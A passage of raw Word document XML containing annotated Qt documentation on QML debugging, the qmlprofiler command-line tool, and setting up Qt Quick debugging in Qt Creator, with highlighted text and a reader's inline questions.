          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(optional) prevents the application from running until the debug client connects to the server. This enables debugging from the start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After the application has successfully started, it displays the following message</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Debugger: Waiting for connection on port &lt;port_number&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu how does it work?</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="003613F0" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2754" w:name="connecting-to-applications"/>
      <w:bookmarkStart w:id="2755" w:name="_Toc483604469"/>
      <w:bookmarkStart w:id="2756" w:name="_Toc483605689"/>
      <w:bookmarkEnd w:id="2754"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Connecting to Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2755"/>
      <w:bookmarkEnd w:id="2756"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When the application is running, an IDE or a tool that implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binary protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> can connect to the open port</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt provides a</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlprofiler</w:t>
      </w:r>
      <w:r w:rsidR="003613F0" w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command line tool to capture profiling data in a file</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. To run the tool, enter the following </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4677"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlprofiler -p &lt;port&gt; -attach &lt;ip address&gt;</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu how does it work?</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2757" w:name="debugging-with-qt-creator"/>
      <w:bookmarkStart w:id="2758" w:name="_Toc483604470"/>
      <w:bookmarkStart w:id="2759" w:name="_Toc483605690"/>
      <w:bookmarkEnd w:id="2757"/>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugging with Qt Creator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2758"/>
      <w:bookmarkEnd w:id="2759"/>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">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color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Creator uses the debugging infrastructure to debug, inspect and profile Qt Quick applications on the desktop as well as on remote devices</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Qt Creator provides </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integrated clients for debugging JS, inspecting the object tree, and profiling the activities of a QML engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For more information, see</w:t>
      </w:r>
      <w:r w:rsidR="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3017" w:history="1">
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Creator: Debugging Qt Quick Pr</w:t>
        </w:r>
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>o</w:t>
        </w:r>
        <w:r w:rsidRPr="00162275">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>jects</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B1D83" w:rsidRDefault="003613F0" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3018" w:history="1">
        <w:r w:rsidRPr="00AA66ED">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qtcreator/creator-debugging-qml.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="003613F0">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2760" w:name="_Toc483604471"/>
      <w:bookmarkStart w:id="2761" w:name="_Toc483605691"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugging Qt Quick Projects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2760"/>
      <w:bookmarkEnd w:id="2761"/>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b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You need Qt 4.8 or later to debug Qt Quick projects</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For an example of how to debug Qt Quick Projects, see</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3019" w:history="1">
        <w:r w:rsidRPr="003613F0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Debugging a Qt Quick Example Application</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003613F0" w:rsidRPr="003613F0" w:rsidRDefault="003613F0" w:rsidP="005E0A42">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2762" w:name="setting-up-qml-debugging"/>
      <w:bookmarkStart w:id="2763" w:name="_Toc483604472"/>
      <w:bookmarkStart w:id="2764" w:name="_Toc483605692"/>
      <w:bookmarkEnd w:id="2762"/>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting Up QML Debugging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2763"/>
      <w:bookmarkEnd w:id="2764"/>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color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The process of setting up debugging for Qt Quick projects </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>depends on the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId3020" w:history="1">
        <w:r w:rsidRPr="005E0A42">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>type of the project</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Qt Quick UI or Qt Quick Application</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the Qt version used</w:t>
      </w:r>
      <w:r w:rsidRPr="003613F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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5E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To debug Qt Quick UI projects, select the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable QML</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>check box in the</w:t>
      </w:r>
      <w:r w:rsidR="005E0A42" w:rsidRPr="005E0A42">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0A42">
        <w:rPr>
